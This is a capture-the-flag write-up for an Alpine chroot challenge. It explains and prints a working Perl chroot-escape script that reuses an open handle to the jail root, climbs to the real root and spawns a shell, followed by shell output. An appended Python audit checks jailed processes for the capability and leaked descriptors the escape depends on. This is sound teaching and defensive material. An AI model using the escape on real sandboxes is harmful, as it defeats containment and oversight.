Not So Great Escape

We've set up a chroot for you to develop your musl code in. It's bare, so install whatever you need. The password is ... Feel free to log in with: socat -,raw,echo=0


Looks like it's an Alpine Linux chroot, meaning apk is the package manager of choice. We did some quick searching and found these slides on breaking out of chroot. We then searched for a quick script for one of the basic methods and found this (also see code):

The basic idea behind the method is to first open a file (here, the jail's root directory) and keep a handle to it, then create a new chroot below it that contains no path to that file. From inside the new chroot we then use the saved handle, which refers to a directory the new root cannot even name.

chroot(2) only changes the directory that path resolution starts from; it does not close or revalidate handles that are already open. So the saved handle still lands us in the old jail root, from where we can simply cd upwards (".." keeps working because the kernel no longer treats the old jail root as a boundary) until "." and ".." are the same inode, i.e. the real root, and then chroot into that.


#!/usr/bin/perl -w
use strict;
# Dec 2007

# This script may be used for legal purposes only.

# Go to the root of the jail
chdir "/";

# Open filehandle to root of jail (chroot does not close open handles)
opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jail\n";

# Create a subdir, move into it
mkdir "mysubdir";
chdir "mysubdir" or die "ERROR: Couldn't chdir into mysubdir\n";

# Lock ourselves in a new jail (chroot(2) needs root / CAP_SYS_CHROOT)
chroot "." or die "ERROR: chroot failed: $!\n";

# Use our filehandle to get back to the root of the old jail (fchdir)
chdir JAILROOT or die "ERROR: Couldn't chdir to saved handle: $!\n";

# Get to the real root: go up until "." and ".." are the same device+inode
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
        chdir "..";
}

# Lock ourselves in real root - so we're not really in a jail at all now
chroot ".";

# Start an un-jailed shell
exec "/bin/sh";

Now, before we can run it, we need to make sure the box has perl installed: apk add perl. Then we simply run it and we're in the real root:

/ # ls
bin    etc    lib    mnt    proc   root   sbin   sys    usr
dev    home   media  opt    pwn    run    srv    tmp    var
/ # ls pwn
flag.txt             jail                 not-so-great-escape
/ # cat pwn/flag.txt
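As an added example (not part of this writeup), the two things the escape above depends on can be checked from outside the jail: the process still holds CAP_SYS_CHROOT in its effective set (so it may call chroot(2) again), and it holds an open descriptor pointing outside its current root. The status text, fd link targets and paths below are constructed to mirror the walkthrough; the capability bit number is the one from the Linux headers.

```python
import os
import re

CAP_SYS_CHROOT = 18  # capability bit number from linux/capability.h

def parse_capeff(status_text):
    """Effective capability mask from the text of /proc/<pid>/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    return int(m.group(1), 16) if m else 0

def can_call_chroot(status_text):
    """chroot(2) fails with EPERM unless CAP_SYS_CHROOT is in the effective set."""
    return bool((parse_capeff(status_text) >> CAP_SYS_CHROOT) & 1)

def fds_outside_root(root, fd_targets):
    """fd numbers whose open file lies outside the jail root.
    fd_targets maps fd -> readlink("/proc/<pid>/fd/<fd>") as seen from the host."""
    root = os.path.normpath(root)
    leaked = []
    for fd, target in fd_targets.items():
        if not target.startswith("/"):      # pipe:[..], socket:[..], anon_inode:..
            continue
        target = target.replace(" (deleted)", "")
        if os.path.commonpath([root, target]) != root:
            leaked.append(fd)
    return sorted(leaked)

def audit(root, status_text, fd_targets):
    """Findings for one jailed process; an empty list means neither precondition holds."""
    findings = []
    if can_call_chroot(status_text):
        findings.append("effective CAP_SYS_CHROOT: process can chroot() again")
    leaked = fds_outside_root(root, fd_targets)
    if leaked:
        findings.append("open fds outside jail root: %s" % leaked)
    return findings

# Constructed sample data mimicking /proc/<pid>/status and /proc/<pid>/fd links
STATUS_ROOT = "Name:\tperl\nUid:\t0\t0\t0\t0\nCapEff:\t000001ffffffffff\n"
STATUS_DROPPED = "Name:\tperl\nUid:\t1000\t1000\t1000\t1000\nCapEff:\t0000000000000000\n"
JAIL = "/pwn/jail/mysubdir"            # host-side view of the root after the script's first chroot(".")
FDS = {3: "/pwn/jail", 4: "/pwn/jail/mysubdir/bin/sh", 5: "socket:[4242]"}

if __name__ == "__main__":
    for name, status in (("as root", STATUS_ROOT), ("privs dropped", STATUS_DROPPED)):
        print(name, audit(JAIL, status, FDS))
```

A jail whose process has dropped to an unprivileged uid and closed every descriptor opened before the chroot reports nothing; the walkthrough's perl process reports both findings.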